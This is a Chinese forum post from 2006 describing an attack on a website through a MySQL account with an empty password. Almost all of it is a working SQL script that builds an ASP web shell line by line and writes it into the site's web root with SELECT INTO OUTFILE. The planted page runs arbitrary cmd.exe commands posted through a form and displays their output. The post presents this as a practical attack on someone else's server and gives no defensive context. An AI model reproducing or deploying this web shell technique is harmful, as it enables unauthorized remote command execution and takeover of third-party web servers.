利用mysql空密码进行攻击

Cyisz

UID: 28650
帖子: 3
积分: 6
在线时间: 10 分钟

1^# Cyisz 发表于 2006-10-14 00:51

利用mysql空密码进行攻击

　　一天,突然得到一网站的mysql的账号,并查到它的主页所在位置为c:\www\www,首先在网上下载一个cmd.asp程序,然后写一个cmd.sql程序以便进行连接,把cmd.asp上传至它的目录,cmd.sql内容如下:

复制内容到剪贴板

代码:

use test;
create table tmp(cmd TEXT);
insert into tmp values("<%@ Language=VBScript %>");
insert into tmp values("<%");
insert into tmp values("Dim oScript");
insert into tmp values("Dim oScriptNet");
insert into tmp values("Dim oFileSys, oFile");
insert into tmp values("Dim szCMD, szTempFile");
insert into tmp values("On Error Resume Next");
insert into tmp values("' -- create the COM objects that we will be using -- '");
insert into tmp values('Set oScript = Server.CreateObject("WSCRIPT.SHELL")');
insert into tmp values('Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")');
insert into tmp values('Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")');
insert into tmp values("' -- check for a command that we have posted -- '");
insert into tmp values('szCMD = Request.Form(".CMD")');
insert into tmp values('If (szCMD <> "") Then');
insert into tmp values("' -- Use a poor mans pipe ... a temp file -- '");
insert into tmp values('szTempFile = "C:\" & oFileSys.GetTempName( )');
insert into tmp values('Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)');
insert into tmp values('Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)');
insert into tmp values("End If");
insert into tmp values("%>");
insert into tmp values("<HTML>");
insert into tmp values("<BODY>");
insert into tmp values('<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">');
insert into tmp values('<input type=text name=".CMD" size=45 value="<%= szCMD %>">');
insert into tmp values('<input type=submit value="Run">');
insert into tmp values("</FORM>");
insert into tmp values("<PRE>");
insert into tmp values('<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>');
insert into tmp values("<br>");
insert into tmp values("<%");
insert into tmp values("If (IsObject(oFile)) Then");
insert into tmp values("' -- Read the output from our command and remove the temp file -- '");
insert into tmp values("On Error Resume Next");
insert into tmp values("Response.Write Server.HTMLEncode(oFile.ReadAll)");
insert into tmp values("oFile.Close");
insert into tmp values("Call oFileSys.DeleteFile(szTempFile, True)");
insert into tmp values("End If");
insert into tmp values("%>");
insert into tmp values("</BODY>");
insert into tmp values("</HTML>");
select * from tmp into outfile "c:\\www\\www\\234.asp";
drop table tmp;